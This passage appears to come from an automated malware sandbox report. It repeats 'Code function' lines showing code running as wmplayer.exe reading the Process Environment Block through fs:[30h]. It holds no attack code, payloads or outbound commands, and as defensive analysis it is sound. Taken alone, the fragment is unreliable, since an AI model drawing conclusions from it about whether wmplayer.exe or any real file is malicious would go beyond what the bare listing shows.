            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D1131 mov eax, dword ptr fs:[00000030h]6_2_032D1131
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03390115 mov eax, dword ptr fs:[00000030h]6_2_03390115
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov ecx, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov eax, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov eax, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov eax, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03369179 mov eax, dword ptr fs:[00000030h]6_2_03369179
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5152 mov eax, dword ptr fs:[00000030h]6_2_033A5152
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov ecx, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D6154 mov eax, dword ptr fs:[00000030h]6_2_032D6154
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D6154 mov eax, dword ptr fs:[00000030h]6_2_032D6154
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC156 mov eax, dword ptr fs:[00000030h]6_2_032CC156
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D7152 mov eax, dword ptr fs:[00000030h]6_2_032D7152
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EB1B0 mov eax, dword ptr fs:[00000030h]6_2_032EB1B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03327190 mov eax, dword ptr fs:[00000030h]6_2_03327190
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338C188 mov eax, dword ptr fs:[00000030h]6_2_0338C188
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338C188 mov eax, dword ptr fs:[00000030h]6_2_0338C188
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03310185 mov eax, dword ptr fs:[00000030h]6_2_03310185
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA197 mov eax, dword ptr fs:[00000030h]6_2_032CA197
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA197 mov eax, dword ptr fs:[00000030h]6_2_032CA197
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA197 mov eax, dword ptr fs:[00000030h]6_2_032CA197
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D51ED mov eax, dword ptr fs:[00000030h]6_2_032D51ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033001F8 mov eax, dword ptr fs:[00000030h]6_2_033001F8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A61E5 mov eax, dword ptr fs:[00000030h]6_2_033A61E5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330D1D0 mov eax, dword ptr fs:[00000030h]6_2_0330D1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330D1D0 mov ecx, dword ptr fs:[00000030h]6_2_0330D1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A51CB mov eax, dword ptr fs:[00000030h]6_2_033A51CB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033961C3 mov eax, dword ptr fs:[00000030h]6_2_033961C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033961C3 mov eax, dword ptr fs:[00000030h]6_2_033961C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA020 mov eax, dword ptr fs:[00000030h]6_2_032CA020
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC020 mov eax, dword ptr fs:[00000030h]6_2_032CC020
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03354000 mov ecx, dword ptr fs:[00000030h]6_2_03354000
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D070 mov ecx, dword ptr fs:[00000030h]6_2_0334D070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5060 mov eax, dword ptr fs:[00000030h]6_2_033A5060
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335106E mov eax, dword ptr fs:[00000030h]6_2_0335106E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FC073 mov eax, dword ptr fs:[00000030h]6_2_032FC073
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov ecx, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337705E mov ebx, dword ptr fs:[00000030h]6_2_0337705E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337705E mov eax, dword ptr fs:[00000030h]6_2_0337705E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D2050 mov eax, dword ptr fs:[00000030h]6_2_032D2050
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB052 mov eax, dword ptr fs:[00000030h]6_2_032FB052
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033960B8 mov eax, dword ptr fs:[00000030h]6_2_033960B8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033960B8 mov ecx, dword ptr fs:[00000030h]6_2_033960B8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD08D mov eax, dword ptr fs:[00000030h]6_2_032CD08D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D208A mov eax, dword ptr fs:[00000030h]6_2_032D208A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330909C mov eax, dword ptr fs:[00000030h]6_2_0330909C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D5096 mov eax, dword ptr fs:[00000030h]6_2_032D5096
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD090 mov eax, dword ptr fs:[00000030h]6_2_032FD090
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD090 mov eax, dword ptr fs:[00000030h]6_2_032FD090
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033120F0 mov ecx, dword ptr fs:[00000030h]6_2_033120F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D80E9 mov eax, dword ptr fs:[00000030h]6_2_032D80E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F50E4 mov eax, dword ptr fs:[00000030h]6_2_032F50E4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F50E4 mov ecx, dword ptr fs:[00000030h]6_2_032F50E4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA0E3 mov ecx, dword ptr fs:[00000030h]6_2_032CA0E3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC0F0 mov eax, dword ptr fs:[00000030h]6_2_032CC0F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A50D9 mov eax, dword ptr fs:[00000030h]6_2_033A50D9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033520DE mov eax, dword ptr fs:[00000030h]6_2_033520DE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F90DB mov eax, dword ptr fs:[00000030h]6_2_032F90DB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D0C0 mov eax, dword ptr fs:[00000030h]6_2_0334D0C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D0C0 mov eax, dword ptr fs:[00000030h]6_2_0334D0C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334C730 mov eax, dword ptr fs:[00000030h]6_2_0334C730
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03305734 mov eax, dword ptr fs:[00000030h]6_2_03305734
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330273C mov eax, dword ptr fs:[00000030h]6_2_0330273C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330273C mov ecx, dword ptr fs:[00000030h]6_2_0330273C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330273C mov eax, dword ptr fs:[00000030h]6_2_0330273C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D3720 mov eax, dword ptr fs:[00000030h]6_2_032D3720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EF720 mov eax, dword ptr fs:[00000030h]6_2_032EF720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EF720 mov eax, dword ptr fs:[00000030h]6_2_032EF720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EF720 mov eax, dword ptr fs:[00000030h]6_2_032EF720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330C720 mov eax, dword ptr fs:[00000030h]6_2_0330C720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330C720 mov eax, dword ptr fs:[00000030h]6_2_0330C720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339972B mov eax, dword ptr fs:[00000030h]6_2_0339972B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F72E mov eax, dword ptr fs:[00000030h]6_2_0338F72E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D973A mov eax, dword ptr fs:[00000030h]6_2_032D973A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D973A mov eax, dword ptr fs:[00000030h]6_2_032D973A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9730 mov eax, dword ptr fs:[00000030h]6_2_032C9730
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9730 mov eax, dword ptr fs:[00000030h]6_2_032C9730
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03300710 mov eax, dword ptr fs:[00000030h]6_2_03300710
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D7703 mov eax, dword ptr fs:[00000030h]6_2_032D7703
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D5702 mov eax, dword ptr fs:[00000030h]6_2_032D5702
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D5702 mov eax, dword ptr fs:[00000030h]6_2_032D5702
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330F71F mov eax, dword ptr fs:[00000030h]6_2_0330F71F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330F71F mov eax, dword ptr fs:[00000030h]6_2_0330F71F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330C700 mov eax, dword ptr fs:[00000030h]6_2_0330C700
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D0710 mov eax, dword ptr fs:[00000030h]6_2_032D0710
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h]6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h]6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h]6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h]6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D8770 mov eax, dword ptr fs:[00000030h]6_2_032D8770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h]6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03354755 mov eax, dword ptr fs:[00000030h]6_2_03354755
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312750 mov eax, dword ptr fs:[00000030h]6_2_03312750
